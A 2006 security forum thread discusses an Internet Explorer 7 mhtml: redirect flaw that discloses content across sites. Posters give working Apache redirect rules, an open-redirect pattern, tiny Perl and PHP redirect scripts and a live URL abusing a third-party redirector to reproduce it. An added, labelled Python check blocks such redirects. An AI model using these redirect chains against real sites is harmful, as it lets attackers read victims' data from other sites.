Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
IE 7 hole on release - shocked, shocked I am
Posted by: id
Date: October 19, 2006 03:03PM

http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/

shocked.

-id

Re: IE 7 hole on release - shocked, shocked I am
Posted by: id
Date: October 19, 2006 03:06PM

bah, rsnake beat me to it on ha.ckers

-id

Re: IE 7 hole on release - shocked, shocked I am
Posted by: maluc
Date: October 19, 2006 06:50PM

Well for those looking to test it out, you can add a specific website by adding this to the httpd.conf in Apache web servers, inside the <IfModule alias_module></IfModule>:
    Redirect /foo.php mhtml:http_//mrsunshine/bar.php
    Redirect /bar.php http_//www.victimsite.com

Usage: http_//mysite.com/foo.php

If you want a general purpose one, this'll work but creates an open redirect so keep that in mind. Also in the <IfModule alias_module></IfModule>:
    RedirectMatch \/redir\/\*(.*)$ $1

Usage: http_//mysite.com/redir/*mhtml:http_//mysite.com/redir/*http_//targetsite.com

To add to the .htaccess instead, I believe it's the same, just minus the initial / forward slash, i.e. /foo.php to foo.php, /bar.php to bar.php, and \/redir\/ to redir\/ .. but don't quote me on that, RTFM.

But most importantly, finally a non-phishing use for open redirects ^^
http://www.pussy.org/cgi-bin/ucj/c.cgi?url=mhtml:http://www.pussy.org/cgi-bin/ucj/c.cgi?url=http://disney.com

-maluc

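Added example, not part of maluc's post or of the thread: the defensive counterpart to the open-redirect caveat above, a check a redirector can run on its target before emitting a Location header, which refuses both the `mhtml:` prefix and off-site hosts. The function name, the `ALLOWED_HOSTS` values and the fallback path are assumptions made for this example.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for this example; a real redirector lists its own hosts.
ALLOWED_HOSTS = {"mysite.com", "www.mysite.com"}


def safe_redirect_target(target, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return `target` if it is safe to put in a Location header, else `fallback`.

    Accepts only rooted same-site paths or absolute http(s) URLs whose host
    is on the allowlist.
    """
    # Empty input, whitespace/control characters (header injection) and
    # backslashes (parsed as "/" by some browsers) are refused outright.
    if not target or any(ord(c) < 0x21 or c == "\\" for c in target):
        return fallback
    try:
        parts = urlsplit(target)
    except ValueError:
        return fallback
    if not parts.scheme and not parts.netloc:
        # Relative reference: allow a rooted path only, never "//host/...".
        if target.startswith("/") and not target.startswith("//"):
            return target
        return fallback
    if parts.scheme not in ("http", "https"):
        # urlsplit lowercases the scheme, so this also covers "MHTML:".
        # Rejects mhtml:, javascript:, data: and any other wrapper scheme.
        return fallback
    host = (parts.hostname or "").lower()
    if parts.username is not None or host not in allowed_hosts:
        # Off-site host, or "user@host" tricks such as mysite.com@other.example.
        return fallback
    return target
```

Applied to the `/redir/*` pattern above, the value checked is everything after the `*`.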
Re: IE 7 hole on release - shocked, shocked I am
Posted by: rsnake
Date: October 19, 2006 07:05PM

hahah... nice... and yes, all that will work... or you can just set up a tiny .cgi or .php script to do redirection. It doesn't need to be robust:

    $cat a.cgi b.cgi
    #!/usr/bin/perl
    print "Location: mhtml://www.google.com\n\n";

    #!/usr/bin/perl
    print "Location: html://www.google.com\n\n";

- RSnake
Gotta love it. http://ha.ckers.org

Re: IE 7 hole on release - shocked, shocked I am
Posted by: maluc
Date: October 19, 2006 08:06PM

ya.. <?php header("Location: http://www.google.com"); exit(); ?> for php should do it. Was more of a personal preference :x

If I can't do something from javascript space, I like to switch to the other extreme, and do it from the webserver conf. Although for malware portability, php is probably the best choice :/

-maluc

Re: IE 7 hole on release - shocked, shocked I am
Posted by: lpilorz
Date: October 23, 2006 08:38AM

As far as I know, msoert2.dll is not present by default in Windows Vista (which has Windows Mail instead of Outlook Express), so probably its users are not vulnerable.

Nothing new, I just wrote it for anyone that could look for info here.
